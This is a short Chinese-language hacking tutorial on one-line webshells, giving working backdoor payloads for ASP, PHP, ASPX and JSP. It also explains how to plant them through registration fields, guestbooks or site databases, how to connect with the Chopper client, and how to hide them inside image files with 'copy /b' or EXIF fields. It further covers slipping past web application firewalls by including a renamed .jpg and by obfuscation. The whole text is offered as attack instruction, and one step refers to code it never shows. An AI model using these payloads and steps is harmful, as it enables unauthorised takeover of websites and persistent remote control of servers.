05、一句话木马,小马和大马
可以在注册邮箱或者个人主页插入一句话木马,value值可以随意设置,在使用菜刀连接时要用到该value值。
当知道了数据库的url,可以利用本地一张页面进行连接得到webshell,不知道数据库也可以,只要知道一句话木马文件被插入到哪里就可以。B/S架构。
asp:<%eval request("value")%>
php:<?php @eval($_POST[value]);?>
aspx:<%@Page Language="Jscript"%>、<%@eval(Request.Item["value"])%>
jsp:<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
jsp需要将该一句话木马jsp放到网站ROOT目录下,再用如下进行连接:
再将:
jsp一句话客户端的代码复制到内容框里进行提交,再访问shell.jsp,就可以用菜刀连接了。
一句话木马制作:
打开c32,把图片放进去,在最后写入一句话木马,退出,cmd:copy /b 1.jpg+1.asp 2.jpg
或者在图片属性详细信息版权里插入一句话木马。
用浏览器访问该图片,再用菜刀连接。
asp使用方法:找到asp网站,利用留言板,或者发表文章把一句话添加到asp数据库,或者加进asp网页,主要是为了能将一句话木马添加进数据库。
小马主要是为了能够上传大马,因为大马容易被系统追杀。
使用加密绕过waf、使用包含进行突破waf。
asp:<!--#include file="xxx.jpg">如果不是同一级,需要在文件名称前添加相对路径。
将上面一句话保存为xx,asp。
xxx.jpg是xxx.asp木马改后缀而来的,可以躲避防火墙拦截。
浏览器访问xx.asp。
过狗一句话也能够绕过防火墙。